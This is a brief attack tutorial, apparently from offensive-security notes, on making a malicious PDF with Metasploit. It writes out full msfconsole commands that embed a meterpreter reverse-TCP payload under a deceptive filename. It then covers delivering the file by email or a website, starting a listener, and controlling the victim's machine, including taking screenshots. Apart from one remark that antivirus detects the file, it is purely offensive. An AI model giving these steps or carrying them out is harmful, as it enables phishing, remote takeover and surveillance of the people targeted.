Adobe PDF Attack

Attackers can compromise target machine by sending malicious PDF.

- [adobe_pdf_embedded_exe](https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/fileformat/adobe_pdf_embedded_exe)

- [watch-on-youutube](https://www.youtube.com/watch?v=xYBsXkxDRh0)

Exploitation using Metasploit

The PDF created by this process can be easily detected by modern Windows built-in antivirus. So this exploitation may be not useful for attackers.

1. Create a PDF

Attackers can create a malicious PDF using metasploit.

msfconsole

msf> use exploit/windows/fileformat/adobe_pdf_embedded_exe
# Set payload for windows if target machine is windows
msf> set payload windows/x64/meterpreter/reverse_tcp
# Set the attacker's ip address
msf> set lhost 10.0.0.1
# Change filename
msf> set filename supersafe.pdf
# Optionally, the custom PDF can be used
msf> set infilename /path/to/custom.pdf
msf> exploit

2. Send PDF to Target Machine

After creating a PDF, attackers need to send it to target user. There are various ways to do that. For example,

• Host the PDF in attacker’s website.
• Send an email with this PDF attached.

3. Start Listener in Attacker’s Machine

To receive incoming connection from target machine, attackers start a listener in their machine.

msf> use exploit/multi/handler
# Match the payload when PDF was created
msf> set payload windows/x64/meterpreter/reverse_tcp
# Set the attacker's ip address
msf> set lhost 10.0.0.1
msf> exploit

4. Reverse Shell

When a victim open the PDF using Adobe Reader, this file starts a reverse shell to connect the attacker’s machine.
After that, attackers can control the victim’s machine in their terminal.

# In metasploit session

meterpreter> pwd
# Take a screenshot of the victim's screen
meterpreter> screenshot